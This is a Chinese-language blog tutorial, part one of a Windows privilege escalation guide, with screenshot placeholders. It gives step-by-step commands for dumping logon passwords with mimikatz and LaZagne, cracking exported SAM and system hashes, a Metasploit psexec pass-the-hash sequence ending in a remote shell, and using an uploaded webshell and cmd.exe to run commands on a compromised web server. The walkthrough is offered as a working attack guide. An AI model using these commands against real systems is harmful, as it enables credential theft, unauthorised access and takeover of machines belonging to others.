windows提权(上)_linux

只能搞个阉割版,不放工具了。我这里分开成两个部分传

mimikatz读密码:

privilege::debug //提升权限

windows提权(上)_linux_02

sekurlsa::logonpassWords //抓取密码

windows提权(上)_linux_03

xp不支持而已,win7可以

laZagne.exe读取密码:

linux,windows都支持

windows提权(上)_新建用户_04

选项:

windows提权(上)_linux_05

效果:

windows提权(上)_linux_06

laZagne.exe all >>1.txt #导出结果

高版本2016,2012则可以读取hash,比如Pwdump7

彩虹表:

kali自带

windows提权(上)_新建用户_07

字典很大,速度很快,pojie纯数字很快:

windows提权(上)_远程登录_08

导出windows的SAM,system文件,导入kali,Crack  pojie。

kali的msf,利用hash远程登录系统:

针对无法读出的密码

要kali2.0,博主之前装失败了不再演示

msfconsole

msf > use exploit/windows/smb/psexec

msf > set rhost 192.168.1.105

msf > set SMBUser administrator

msf > set SMBPass #接工具读出来的hash

msf > exploit

msf > shell

windows权限提升:

我直接把文件拖进去

windows提权(上)_新建用户_09

用wt.asp看文件夹,文件读写的权限

windows提权(上)_新建用户_10

windows提权(上)_远程登录_11

因为:

windows提权(上)_远程登录_12

找到cmd.exe,拖出来:

windows提权(上)_远程登录_13

拖进菜刀:

windows提权(上)_新建用户_14

执行:setp c:\wmpub\cmd.exe

windows提权(上)_远程登录_15

阔以了:

windows提权(上)_linux_16

可以执行命令不能新建用户:

windows提权(上)_linux_17